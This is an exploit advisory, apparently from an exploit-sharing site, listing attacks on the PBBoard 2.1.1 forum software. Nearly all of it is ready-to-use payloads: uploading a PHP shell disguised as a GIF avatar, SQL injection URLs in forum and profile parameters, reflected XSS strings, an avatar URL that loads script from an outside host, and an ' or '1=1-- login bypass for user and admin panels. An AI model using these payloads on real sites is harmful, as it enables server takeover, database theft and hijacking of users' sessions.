59 lines
No EOL
1.7 KiB
Text
59 lines
No EOL
1.7 KiB
Text
==================================================
|
|
PBBoard 2.1.1 Multiple Remote Vulnerabilities
|
|
==================================================
|
|
|
|
|=-----------------------------------------------------=|
|
|
|=-------------=[ JIKO |No-exploit.Com| ]=-----------=|
|
|
|=-----------------------------------------------------=|
|
|
[~]-----------|00|
|
|
NAme :JIKO (JAWAD)
|
|
Home :No-exploit.Com
|
|
Mail : !x!
|
|
[~]-----------|01|
|
|
-{Script}
|
|
name :PBBoard_v2.1.1
|
|
link :http://www.pbboard.com/PBBoard_v2.1.1.zip
|
|
|
|
[~]-----------|02|
|
|
-{3xpl01t}
|
|
|
|
upload Shell and file .exe ....etc :(
|
|
http://localhost/ara/index.php?page=usercp&control=1&avatar=1&main=1
|
|
select From my Pc
|
|
and upload your Shell php with GIF89a; you can see the size of img is long use a programme for inser php code in img
|
|
|
|
sql & xss
|
|
all script is infected :(
|
|
inser '( in all % variable in the script
|
|
SQl :/index.php?page=forum&show=1&id=2'a
|
|
Xss :/index.php?page=forum&show=1&id=2'a<br>hello <script>alert(123)</script>
|
|
|
|
SQl :/index.php?page=profile&show=1&username=jawad'
|
|
SQl :/index.php?page=profile&show=1&username=jawad' and id='1
|
|
Xss :/index.php?page=profile&show=1&username=jawad'a<br>hello <script>alert(123)</script>
|
|
........etc
|
|
|
|
Xss In Profil
|
|
|
|
Url :/index.php?page=usercp&control=1&avatar=1&main=1
|
|
Select img From Url
|
|
http://"><SCRIPT/XSS SRC="http://no-exploit/xss.js"></SCRIPT>.gif
|
|
|
|
Login :(
|
|
|
|
User : real name of admin or member you want | jawad' or '1=1--
|
|
Pass : jiko
|
|
|
|
for admin panel
|
|
|
|
Url : /admin.php
|
|
User : jawad' or '1=1--
|
|
Pass : jiko
|
|
:((..Etc exploit
|
|
|
|
|
|
[~]-----------|03|
|
|
-{Greetz}
|
|
All my friends
|
|
|No-Exploit.com Members
|
|
------------------------------------- |